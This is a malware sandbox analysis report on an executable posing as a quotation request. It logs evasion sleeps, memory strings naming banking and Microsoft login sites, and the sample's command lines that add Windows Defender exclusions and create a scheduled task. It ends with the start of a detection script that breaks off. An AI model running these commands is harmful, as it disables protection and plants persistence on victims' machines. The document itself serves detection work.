Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599655s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599326s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599107s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598671s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597687s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597578s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597469s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597359s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597250s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597139s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -597031s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596594s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596484s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596375s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596265s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596156s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -596047s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595937s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595828s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595719s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595609s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595500s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595390s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595281s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595172s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -595062s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -594843s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -594720s >= -30000s
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560 Thread sleep time: -594594s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7736 Thread sleep count: 1284 > 30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7736 Thread sleep count: 8573 > 30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599541s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599109s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598890s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598560s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597885s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597781s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597672s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597562s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597453s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597344s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597232s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597125s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -597016s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596891s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596766s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596546s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596219s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596109s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -596000s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595891s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595766s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595641s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595531s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595422s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595312s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -595094s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -594984s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -594875s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -594765s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -594656s >= -30000s
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732 Thread sleep time: -594547s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580 Thread sleep count: 1317 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580 Thread sleep count: 1251 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580 Thread sleep count: 851 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580 Thread sleep count: 1244 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580 Thread sleep count: 1094 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3826307981.0000000001348000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfoX
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696497155f
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696497155s
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696497155j
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696497155o
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3826220785.0000000000C99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllok
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: NuDUTBObHpKADz.exe, 0000000A.00000002.1468102089.0000000001162000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9548 LdrInitializeThunk, 9_2_06DE9548
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory written: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"
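The process-creation entries above show three behaviours worth alerting on in endpoint telemetry: powershell.exe adding Windows Defender path exclusions for the sample and its dropped copy (Add-MpPreference -ExclusionPath), schtasks.exe creating the "Updates\NuDUTBObHpKADz" task from an XML file written to the user's Temp folder, and each executable spawning a copy of itself (the child that later receives the injected PE). The script below is an added example, not part of the sandbox report; it runs the corresponding detection rules over sample lines constructed from the command lines recorded in this section. The "parent|child|command line" layout, the rule names, the severity labels and the benign control line are assumptions for the example; map your own Security 4688 or Sysmon event 1 fields onto the three columns.

```python
"""Flag the defence-evasion and persistence behaviours recorded in this report
(Defender exclusions via Add-MpPreference, schtasks /Create fed an XML file
from a temp folder, a process spawning a copy of itself) in process-creation
telemetry. Added example; not part of the sandbox report."""
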